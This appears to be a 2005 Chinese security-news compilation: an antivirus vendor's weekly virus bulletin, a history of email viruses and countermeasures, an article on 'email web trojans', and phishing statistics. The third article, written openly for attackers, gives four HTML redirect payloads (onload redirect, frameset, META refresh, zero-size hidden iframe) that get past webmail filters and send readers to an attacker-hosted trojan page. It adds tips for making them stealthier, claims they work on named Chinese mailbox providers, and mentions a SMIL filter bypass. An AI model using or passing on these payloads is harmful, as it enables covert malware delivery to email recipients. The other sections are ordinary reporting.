瑞星一周播报(2005.03.07－2005.03.13)

本周热门病毒：

    SCO 炸弹变种 AN （ Worm.Novarg.an ）：警惕程度 ★★★★ ， 蠕虫病毒，通过邮件传播，依赖系统：WIN9X/NT/2000/XP。除了在中毒电脑上搜索电子邮件地址之外，病毒还会利用 Google 等四个搜索引擎在网上查找，并向外大量发送带毒邮件，严重消耗系统资源，可造成网络堵塞。

本周发作病毒：

    ① MSN 木马变种 O （ Worm.MSN.Bropia.o ）：警惕程度 ★★★☆ ， 蠕虫病毒，通过 MSN 传播，依赖系统：WIN9X/NT/2000/XP。病毒会向用户的 MSN 好友发送病毒文件，感染后用户电脑会被植入后门程序，使其可被黑客远程控制。

    ② 拉里莎（ Worm.Larisa.a ）：警惕程度 ★★★☆ ，蠕虫病毒， 通过邮件和局域网传播，依赖系统：WIN9X/NT/2000/XP。此病毒试图清除多个 MSN 蠕虫病毒，但它也会在后台终止多种反病毒软件的运行，且严重消耗系统资源，给用户带来麻烦。

本周升级版本：

    瑞星杀毒软件每个工作日常规升级一次，每周升级的新病毒总数不少于400个！遇到重大病毒第一时间提供解决方案。瑞星杀毒软件2005版、瑞星在线杀毒、瑞星杀毒软件2005“下载版”，这三款产品本周将同步升级至17.17版。

出处：瑞星公司

邮件病毒及反制技术的发展

　　垃圾邮件与邮件病毒已经成为互联网时代的两大杀手，而邮件病毒更甚，因为它不但能产生垃圾邮件，而且还能感染电脑、阻塞网络，造成更大的损失。有矛就有盾，当邮件病毒产生后，就会出现反邮件病毒的技术，那么，邮件病毒到底是怎样产生的呢？反邮件病毒的技术又是怎样的一种情况呢？

　　虽然世界上最早的邮件系统出现在七十年代初期，而最早的病毒则出现在六十年代，但病毒与邮件真正的结合是在Windows操作系统出现并大量应用以后的事。当操作系统进入Windows时代时，微软公司为程序员提供了一个功能强大的API编程接口，该接口将一些复杂的网络、图形处理完全屏蔽起来，使程序员不用熟悉复杂的内部机理即可编制出一些功能强大的程序，正是技术上的这种进步，导致了越来越多的人开始编制一些复杂的网络病毒，邮件病毒就是在这种背景下出现并发展的。

◆ . 第一代：邮件漏洞 VS 邮件查杀技术

　　第一代的邮件病毒主要是利用邮件系统本身的一些漏洞，而反病毒技术主要是以邮件病毒的查杀为主，这一阶段是邮件病毒与反病毒技术发展的第一阶段。

　　1999年～2000年是邮件病毒发展的第一个阶段。1999年，中国互联网迎来了它的一个发展高潮，网民激增到890万，个人电子邮件开始大面积应用，于是，第一个邮件病毒——“美丽莎”诞生了，该病毒会通过Office文件和邮件系统进行传播，发作当天就感染了6000多台电脑。“美丽莎”病毒虽然属于邮件病毒，但是它强大的宏病毒特性实际上促成了宏病毒查杀技术的诞生，这时国内邮件解包技术还处在理论阶段。2000年，“爱虫”邮件病毒开始大面积泛滥，它的泛滥直接导致了邮件病毒查杀技术的出现，标志是瑞星公司推出的杀毒软件2001版。

　　第一代邮件病毒主要是利用系统提供的邮件发送引擎来向外发送大量病毒邮件，病毒往往是利用邮件的漏洞将自身嵌入到邮件正文中，使用户看不到附件，或者编制一些有自动预览能力的邮件，用户只要将鼠标移动到邮件上面就会激活病毒。此时的反邮件病毒技术则是主动清除，即对邮箱进行分析，查杀邮箱内部的病毒。

◆ . 第二代：社会工程学 VS 邮件监控技术

　　第二代的邮件病毒已经抛弃掉了以邮件漏洞为主的概念而大量引入社会工程学因素，以欺骗的方式来诱使用户主动中毒，而这时的反邮件病毒技术有了一个质的发展，出现了以防为主的邮件病毒监控系统，可以从邮箱前端预防邮件病毒。

　　2001年，个人邮箱系统已经相当成熟，邮件病毒也大量产生，其中的代表病毒就是“求职信”，这时候的邮件病毒已经不是简单地利用预览漏洞进行传播了，而是更多地搀入了社会工程学的因素，邮件标题开始采用一些有诱惑性的句子，附件也开始伪装成如MP3之类的多媒体文件了(一般人认为多媒体文件是不会有病毒的) 。为了应对邮件病毒越来越多的趋势，反邮件病毒技术也前进了一步，出现了以防为主的邮件病毒监控系统，该系统能在邮件进入电脑之前将病毒拦截，不但大大减小了通过邮件中毒的可能性，还有效地控制了病毒产生的垃圾邮件数量，减轻了用户的负担。

◆ . 第三代：混合 VS 智能邮件监控技术

　　 第三代邮件病毒除保留有第一代的漏洞特性和第二代的社会工程学特性外，还借鉴了木马、黑客、后门等病毒的特性，具有了混合特性，而此时的反邮件病毒技术则出现了能识别未知邮件病毒的邮件监控系统。

　　 2002年以后，网络编程技术开始成熟，邮件病毒开始借鉴一些其他类型病毒如黑客、木马、后门的技术，于是混合邮件病毒开始大量泛滥，其中的代表病毒就是2003年的“爱情后门 ”和前一段全球泛滥的“SCO 炸弹( Worm.Novarg )”，它们不但能发送病毒邮件，还可以对指定网站发动黑客攻击。而这时反邮件病毒技术也进入了稳步发展阶段，出现了具有未知病毒检测功能的邮件监控系统，它能够识别大量有复杂病毒特性的邮件病毒。

　　以上是邮件病毒与反邮件病毒技术的一个发展历程，邮件病毒还将继续向前发展，然后融入更多的新特性，而反邮件病毒技术也一样，功能会越来越强大。

网络安全风暴雨先驱邮件网页木马

　　大家肯定对网页木马已经很熟悉了，但大家可能对邮件网页木马还不是很熟悉。其实这个也许有些高手以前已经发现并使用很久了。但我一直未见网上及杂志上有此方面的内容。这里我就以技术共享的原则跟大家谈谈邮件网页木马的思路及实现方法。

　　邮件网页木马的危害巨大，它能化被动为主动。目前网络上流行的网页木马其实是很被动的，它需要被害者点击目标网址。随着现在网民的安全观念的增强，网民一般不会轻易点击陌生的网址。但邮件网页木马就不一样了，你可以将电子邮件发送到你想要攻击的目标信箱。只要你根据社会工程学及心理学的知识，将邮件的标题看上去不明显像是垃圾邮件或广告，那么接收者肯定会点击此邮件的。只要他点击了此邮件主题，看了信，哈哈，他就中招了！当然你也可以通过邮件群发器，这样的话，传播速率比普通的网页木马以及电子书木马不知高多少呢!而且它有个最大的优点，那就是具有目标可指定性。它可以攻击你想要的指定用户。这一点是普通方法无法比拟的。

　　邮件网页木马其实就是在发E-mail以HTML方式内嵌网页木马，使邮件本身成为一张网页木马。到这时你也许回大呼，我怎么没想到啊！呵呵，不怕做不到，只怕想不到啊。其实有些技术本身并不难，但就是怕不往这方面想啊。我还是赶快转入正题吧，否则，坏柿子扔过来啦！

　　聪明的你此时可能会说，邮件网页木马岂不是很简单啊，只要在发邮件是选择以HTML方式发送，再将网页木马的源代码写入即可。事实上当然没这么简单，因为国内的绝大部分电子信箱都对其中一些关键代码进行的屏蔽过滤。因而本文将重点研究怎样突破重围，在电子邮件中引入网页木马，达到我们的目的。

　　一般的网页木马都用到javasccript，但绝大部分邮件系统都对<script>标记作了屏蔽。从而我们只能另辟新法。我们可以不直接将网页木马的代码写入邮件中，因为如果写入的话，有关代码会被屏蔽，网页木马将失效。我们可以写入转向代码，使用户浏览此邮件时转向我们放在自己网站上的网页木马。当然，邮件网页木马的难点就在转向代码。写转向代码要有讲究，因为写得不巧妙的话，代码将会被邮件系统屏蔽。

　　下面笔者来谈谈几种有效的可以在电子邮件中引入网页木马的且没被邮件服务器屏蔽的转向代码。因为绝大部分邮件系统都对<script>标记作了屏蔽，所以为了转向代码有效，均不使用JS和VBS标记。

1. window.location 法，代码如下

<body onload="window.location="http://xxxxx";"></body>

2. 框架法，代码如下

<frameset cols="100,*">

<frame src=http://xxxxx scrolling="auto">

</frameset>

　　其中scrolling参数值得注意，合理使用可加强隐蔽性。Cols参数可根据自己的实际情况作更改。

3.META标志法，代码如下

<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://xxxxx ">

　　其中CONTENT后面的阿拉伯数字是代表过几秒中钟转入目标网页。

4.iframe内帧法

<iframe src=http://xxxxx width="0" height="0" frameborder="0">

　　其中width="0" height="0" 是引入网页的大小尺寸，可以根据你的实际需要加以调整。其中的frameborder参数也很重要，如果使用的恰当的话，可以增强邮件网页木马的隐蔽性。为了大家看的清楚，我将widt和height均设置的非零数值，转向的是**的首页。

　 大家由上面两幅图即可知道，如果设置为frameborder=1，邮件中可看见邮件服务器自动加带的页脚广告。而设置为frameborder=0，则如图2所示，它不像普通的信件一样看见邮件服务器自动加带的广告。大家可根据具体情况选择frameborder参数来获得最好的伪装引入效果，使对方感觉不到他所浏览的邮件是已经转向到你的网站上的网页木马。

　 上述代码笔者已经对国内的几乎所有电子信箱作了测试，如网易，搜狐，新浪，亿唐， 21CN，TOM等等。以上四种方法各有千秋。第一种方法的适应范围最小。比如网易、亿唐都屏蔽了它。但第2、3、4方法在国内的信箱测试中均通过。尤其第2、3种方法几乎百试百灵。当然第4种方法也很经典，参数多，隐蔽性强。大家可根据不同的目标信箱选择最有效的转向引入代码。

　 笔者顺便还对几个国外著名的邮箱：hotmail以及Yahoo作了测试，发现它们过滤得都非常严格。上述的4种方法的代码都被过滤了。此时我深感国内邮件提供商与国外的差距。安全观念的差距！但hotmail以及Yahoo并不是固若金汤。以色列网络安全公司GreyMagic Software已经发现hotmail以及Yahoo邮箱也存在过滤不严的漏洞。我们可以用同步多媒体集成语言的（SMIL）的HTML＋TIME技术来突破屏蔽，实现转向引入网页木马的目的。庆幸的是此漏洞最近已经被hotmail以及Yahoo修补。但国内的几乎所有电子信箱均存在此漏洞。

2005年初“钓鱼式”欺诈攻击数较2004年12月增加42%

　　【赛迪网讯】消息，据反钓鱼式欺诈工作组(APWG)公布的数据显示，2005年1月份全球钓鱼式欺诈攻击的数量比2004年12月增长42%。

　　互联网新闻科技版报道，钓鱼式欺诈是利用仿冒的电子邮件和网站欺骗网络用户泄漏个人数据。据统计，今年1月份共出现了12845封新的、独特的钓鱼式欺诈攻击的电子邮件。今年1月份钓鱼式欺诈攻击的网站数量比去年12月份增长47%，从1740个增长到2560个。攻击的种类也在增加，诈骗分子正在寻求对80以外的端口实施攻击，80端口是缺省的HTTP网络协议端口。今年1月份，对非80端口实施的钓鱼式欺诈攻击占攻击总数的10%。APWG认为，从80端口转向其它端口实施攻击表明，受到钓鱼式欺诈攻击的计算机用户正在增多。

　　美国钓鱼式欺诈攻击网站排名第一位，占这类网站的32%。中国和韩国排在第二和第三位，分别占13%和10%。